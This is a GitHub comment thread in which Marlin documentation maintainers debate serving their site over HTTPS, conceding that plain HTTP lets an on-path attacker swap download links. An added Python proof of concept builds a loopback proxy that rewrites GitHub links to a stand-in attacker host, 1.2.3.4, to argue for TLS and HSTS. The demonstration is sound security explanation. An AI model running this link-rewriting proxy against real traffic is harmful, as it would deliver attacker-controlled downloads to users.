Comments (8)
Took a little tweaking, but it seems to work!
from marlindocumentation.
Marlin is not a dynamic site and neither requests nor stores user data (in spite of the required cookie notice). There is no need for the site to be encrypted.
from marlindocumentation.
There is no need for the site to be encrypted.
Sure there is! It's 2019, and all websites ought to be encrypted :)
- There are download links on the Marlin website. When serving over HTTP, it would be easy to replace those links with a malicious download
- Chrome and Safari mark the website as "Not Secure", which just looks bad and scary.
It's very easy and free these days to serve websites over HTTPS, so why not?
from marlindocumentation.
Be sure to pass this on so people understand:
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
I am personally of the opinion that these concerns are overwrought. Malicious files can be served from a secure HTTPS server just as easily simply by getting them onto that site's servers, which is actually a far easier exploit than DNS poisoning.
But here's the crux of the thing. I am very busy right now with many concerns and I don't feel like going out and obtaining a certificate and dealing with the installation and all of that.
This is a volunteer organization and we all pitch in how we can, according to our specialties and our interests. It sounds like you are much more interested in this subject than me. So, I think you should obtain the certificate and you should help one of our volunteers get it installed. Your efforts would be appreciated.
from marlindocumentation.
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
An attacker can easily replace links with his own, served from his own server. Just saying.
from marlindocumentation.
An attacker can easily replace links with his own, served from his own server. Just saying.
Alas, https does not prevent that in any way whatsoever. All HTTPS or SSL does is ensure that no one in the middle can decrypt the packets between you and the server. They can only be decrypted at the endpoints.
from marlindocumentation.
@thinkyhead
HTTPS does prevent that. Probably you misunderstood what I mean.
For example you serve HTML code
<a href="https://github.com/marlin.exe">Download marlin</a>
over HTTP. Then an attacker can connect to your WiFi (for example) and do ARP spoofing (for example) and route all your traffic through his machine.
And then replace HTML on page to
<a href="http://1.2.3.4/marlin.exe">Download marlin</a>
on the fly. Then when you click Download marlin
you are no longer downloading the file from the HTTPS link. It will be a file served by the attacker from his own server.
So point
All of our file downloads are links to HTTPS:// GitHub, not hosted on "quote" marlinfw.org.
makes no sense security-wise when the HTML code with those links is served over HTTP.
from marlindocumentation.
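The rewrite described in the comment above, as an added runnable demo that is not Marlin code and not from this thread: a local plain-HTTP "origin" serves a page carrying an HTTPS download link, an on-path proxy standing in for the ARP-spoofing attacker forwards the request and rewrites the response body on the fly, and a client fetching through the proxy receives the attacker's link instead. The sample page, the loopback hosts and ports, and the attacker address 1.2.3.4 (reused from the comment) are constructed for the demo.

```python
"""On-path rewriting of download links in a page served over plain HTTP.

Added example, not Marlin project code. Everything here runs on loopback;
the 'attacker' is just a second local HTTP server that proxies the first.
"""
import re
import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed sample page, modelled on the anchor quoted in the thread.
ORIGIN_PAGE = (b'<html><body>'
               b'<a href="https://github.com/marlin.exe">Download marlin</a>'
               b'</body></html>')
ATTACKER_ORIGIN = "http://1.2.3.4"  # attacker's own server (placeholder)

# Any link into github.com gets pointed at the attacker instead.
LINK_RE = re.compile(rb'href="https://github\.com/([^"]*)"')

# Ignore HTTP_PROXY-style environment variables so the demo stays on loopback.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def rewrite_links(body: bytes, attacker_origin: str = ATTACKER_ORIGIN) -> bytes:
    """The transformation an on-path attacker applies to a plaintext response."""
    return LINK_RE.sub(
        lambda m: b'href="%s/%s"' % (attacker_origin.encode(), m.group(1)), body)


def fetch(port: int, path: str = "/") -> bytes:
    """Plain HTTP GET against a loopback server."""
    with _opener.open(f"http://127.0.0.1:{port}{path}", timeout=5) as r:
        return r.read()


class OriginHandler(BaseHTTPRequestHandler):
    """The legitimate site: serves its page over HTTP, links point to HTTPS."""
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(ORIGIN_PAGE)))
        self.end_headers()
        self.wfile.write(ORIGIN_PAGE)

    def log_message(self, *args):  # keep the demo quiet
        pass


def make_mitm_handler(origin_port: int):
    """Build the attacker proxy bound to a particular origin port."""
    class MitmHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = rewrite_links(fetch(origin_port, self.path))
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))  # fix length after edit
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):
            pass
    return MitmHandler


def start(handler) -> ThreadingHTTPServer:
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)  # port 0: pick a free one
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def run_demo():
    """Return (page fetched directly, page fetched via the attacker)."""
    origin = start(OriginHandler)
    mitm = start(make_mitm_handler(origin.server_port))
    try:
        return fetch(origin.server_port), fetch(mitm.server_port)
    finally:
        for srv in (origin, mitm):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    direct, via_attacker = run_demo()
    print("direct:      ", direct.decode())
    print("via attacker:", via_attacker.decode())
```

If the origin served the page over HTTPS, the proxy would see only TLS records it cannot parse or alter without the site's private key, so the rewrite step has nothing to work on; the residual risk is the first request being downgraded to HTTP, which a Strict-Transport-Security header closes for repeat visitors. Note also that the attacker does not need to touch the GitHub link target at all, which is why hosting the binaries on an HTTPS site does not help when the page that links to them is delivered in the clear.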
D'oh! Yes, of course you are correct. I was only considering the case of someone who managed to get a bad link into the legitimate site by some means. But truly, the site being open source makes this nigh impossible.
In any case, GitHub has made it much easier to use HTTPS, so we'll give it a try and see how it goes.
from marlindocumentation.